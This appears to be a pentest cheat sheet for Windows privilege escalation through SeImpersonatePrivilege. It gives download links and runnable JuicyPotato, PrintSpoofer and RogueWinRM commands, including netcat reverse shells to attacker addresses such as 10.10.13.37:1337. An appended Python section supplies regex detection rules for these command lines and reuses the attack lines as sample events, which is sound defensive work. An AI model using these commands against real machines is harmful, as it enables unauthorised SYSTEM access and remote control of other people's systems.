# SeImpersonatePrivilege

If the operating system is Windows Server 2016 or older, use Juicy Potato; otherwise, use PrintSpoofer.

## Juicy Potato

Pick a CLSID that matches your system from here:

* <https://github.com/ohpe/juicy-potato/tree/master/CLSID>

Download the Juicy Potato binary from here:

* <https://github.com/ohpe/juicy-potato/releases>

```
C:\Windows\Temp\JuicyPotato.exe -p cmd.exe -a "/c whoami > C:\Users\Public\morph3.txt" -t * -l 1031 -c {d20a3293-3341-4ae8-9aaf-8e397cb63c34}
```

## RoguePotato

I have never played with this one, but it should work in most cases.

* <https://github.com/antonioCoco/RoguePotato>
* <https://github.com/antonioCoco/RoguePotato/releases/tag/1.0>
* <https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/>

## PrintSpoofer

* <https://github.com/itm4n/PrintSpoofer>
* <https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0>

```
.\PrintSpoofer.exe -i -c cmd

.\PrintSpoofer.exe -c "C:\TOOLS\nc.exe 10.10.13.37 1337 -e cmd"
```

## RogueWinRM

* <https://github.com/antonioCoco/RogueWinRM>
* <https://github.com/antonioCoco/RogueWinRM/releases/tag/1.1>

```
.\RogueWinRM.exe -p C:\windows\system32\cmd.exe

.\RogueWinRM.exe -p C:\windows\temp\nc64.exe -a "10.0.0.1 3001 -e cmd"
```
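
Seen from the detection side, the command lines above leave recognisable shapes in process-creation logs (Security Event ID 4688 with command-line auditing, or Sysmon Event ID 1). The following Python is an added example, not part of the original page or of any linked project; the rule names and the sample command lines are constructed for illustration, and the input is assumed to be the command-line field already extracted from those events.

```python
import re

GUID = r"\{[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\}"

# Hypothetical rule names -> regexes that must ALL match (case-insensitive).
RULES = {
    # Tool names from this page; cheap, but defeated by renaming the binary.
    "potato_tool_name": [
        r'(?:juicypotato|roguepotato|printspoofer|roguewinrm)[^\\/\s"]*\.exe'],
    # JuicyPotato argument shape: program, COM listen port and CLSID together.
    "juicypotato_args": [
        r"(?:^|\s)-p\s+\S+", r"(?:^|\s)-l\s+\d{1,5}\b", r"(?:^|\s)-c\s+" + GUID],
    # "<ip> <port> -e cmd": a shell attached to a socket, as in the nc lines.
    "shell_to_socket": [r"\b(?:\d{1,3}\.){3}\d{1,3}\s+\d{1,5}\s+-e\s+cmd\b"],
}


def match_rules(command_line):
    """Return the sorted names of every rule whose patterns all match."""
    return sorted(
        name for name, patterns in RULES.items()
        if all(re.search(p, command_line, re.IGNORECASE) for p in patterns))


def triage(command_lines):
    """Return (command_line, rules) for each command line that hit a rule."""
    hits = [(cmd, match_rules(cmd)) for cmd in command_lines]
    return [(cmd, rules) for cmd, rules in hits if rules]


# Constructed sample command lines (not real logs). The first, third and
# fourth reuse commands from this page; the second renames the binary.
CLSID = "{d20a3293-3341-4ae8-9aaf-8e397cb63c34}"
SAMPLE_EVENTS = [
    r'C:\Windows\Temp\JuicyPotato.exe -p cmd.exe -a "/c whoami" -t * -l 1031 -c ' + CLSID,
    r'C:\Windows\Temp\svc.exe -p cmd.exe -a "/c whoami" -t * -l 1031 -c ' + CLSID,
    r'.\PrintSpoofer.exe -c "C:\TOOLS\nc.exe 10.10.13.37 1337 -e cmd"',
    r'.\RogueWinRM.exe -p C:\windows\temp\nc64.exe -a "10.0.0.1 3001 -e cmd"',
    r'C:\Windows\System32\cmd.exe /c whoami',            # benign
    r'git.exe -c core.autocrlf=true status',             # benign: -c, no CLSID
]

if __name__ == "__main__":
    for cmd, rules in triage(SAMPLE_EVENTS):
        print(f"{','.join(rules):35} {cmd}")
```

The renamed binary in the second sample is caught only by the argument-shape rule, which is why the name rule should be treated as a low-confidence hint on its own.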
